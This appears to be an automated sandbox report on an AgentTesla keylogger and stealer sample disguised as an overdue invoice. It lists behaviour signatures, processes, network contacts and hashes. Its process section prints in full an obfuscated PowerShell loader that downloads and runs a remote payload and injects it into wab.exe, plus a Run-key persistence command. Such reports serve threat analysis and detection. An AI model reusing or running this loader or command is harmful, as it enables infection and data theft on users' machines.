Malware Analysis Report

2024-11-15 06:40

Sample ID 240603-k9swsabb67
Target overdue_invoice.ace
SHA256 5bda2e2623e9c30c9571c974005206a3ebd4e66009069f0105597a9449ff7c57
Tags
agenttesla keylogger persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5bda2e2623e9c30c9571c974005206a3ebd4e66009069f0105597a9449ff7c57

Threat Level: Known bad

The file overdue_invoice.ace was found to be: Known bad.

Malicious Activity Summary

agenttesla keylogger persistence spyware stealer trojan

AgentTesla

Blocklisted process makes network request

Checks computer location settings

Adds Run key to start application

Looks up external IP address via web service

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies registry key

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-03 09:18

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-03 09:18

Reported

2024-06-03 09:20

Platform

win10v2004-20240426-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\overdue_invoice.vbs"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tonsillectomic = "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\\Codebtors\\').Typeregningens;%Rundsavsbladene% ($sartor)" C:\Windows\SysWOW64\reg.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4980 set thread context of 5016 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4168 wrote to memory of 4456 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4168 wrote to memory of 4456 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4456 wrote to memory of 2628 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4456 wrote to memory of 2628 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4456 wrote to memory of 4980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4456 wrote to memory of 4980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4456 wrote to memory of 4980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4980 wrote to memory of 2068 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4980 wrote to memory of 2068 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4980 wrote to memory of 2068 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4980 wrote to memory of 5016 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4980 wrote to memory of 5016 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4980 wrote to memory of 5016 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4980 wrote to memory of 5016 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4980 wrote to memory of 5016 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 5016 wrote to memory of 764 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 5016 wrote to memory of 764 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 5016 wrote to memory of 764 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 764 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 764 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 764 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\overdue_invoice.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. 
ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH 
SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa 
Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. 
ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH 
SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa 
Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 www.innovativebuildingsolutions.in udp
IN 103.21.58.98:443 www.innovativebuildingsolutions.in tcp
US 8.8.8.8:53 98.58.21.103.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
IN 103.21.58.98:443 www.innovativebuildingsolutions.in tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 89.65.42.20.in-addr.arpa udp

Files

memory/4456-0-0x00007FFC72C73000-0x00007FFC72C75000-memory.dmp

memory/4456-1-0x000001CF56080000-0x000001CF560A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t4issik1.lhn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4456-11-0x00007FFC72C70000-0x00007FFC73731000-memory.dmp

memory/4456-12-0x00007FFC72C70000-0x00007FFC73731000-memory.dmp

memory/4980-15-0x0000000004DA0000-0x0000000004DD6000-memory.dmp

memory/4980-16-0x00000000054E0000-0x0000000005B08000-memory.dmp

memory/4980-17-0x00000000054A0000-0x00000000054C2000-memory.dmp

memory/4980-18-0x0000000005C80000-0x0000000005CE6000-memory.dmp

memory/4980-19-0x0000000005CF0000-0x0000000005D56000-memory.dmp

memory/4980-29-0x0000000005E80000-0x00000000061D4000-memory.dmp

memory/4980-30-0x0000000006350000-0x000000000636E000-memory.dmp

memory/4980-31-0x0000000006390000-0x00000000063DC000-memory.dmp

memory/4980-32-0x0000000007CF0000-0x000000000836A000-memory.dmp

memory/4980-33-0x00000000074A0000-0x00000000074BA000-memory.dmp

memory/4980-34-0x0000000007670000-0x0000000007706000-memory.dmp

memory/4980-35-0x00000000075C0000-0x00000000075E2000-memory.dmp

memory/4980-36-0x0000000008370000-0x0000000008914000-memory.dmp

C:\Users\Admin\AppData\Roaming\Skrmet.Kli

MD5 9916e5a5f7afe8c1f861f93999a875f3
SHA1 8d1f119fcb5942cd8e71f3bb1fc527c2a74549cc
SHA256 97cebd696b9e5587ba0a101e2cdabf9bf01ab268d354408fdc349085760579df
SHA512 30b0c3b929218288998b7578672872d84e5fd810543b77de153033b491b0dd9472ccaa711b448fcbd9ccc9a67888e3439aeea5d1c13b2860f1f480a325a24edc

memory/4980-38-0x0000000008920000-0x000000000C57C000-memory.dmp

memory/4456-39-0x00007FFC72C73000-0x00007FFC72C75000-memory.dmp

memory/4456-40-0x00007FFC72C70000-0x00007FFC73731000-memory.dmp

memory/5016-46-0x0000000001200000-0x0000000001240000-memory.dmp

memory/5016-45-0x0000000001200000-0x0000000002454000-memory.dmp

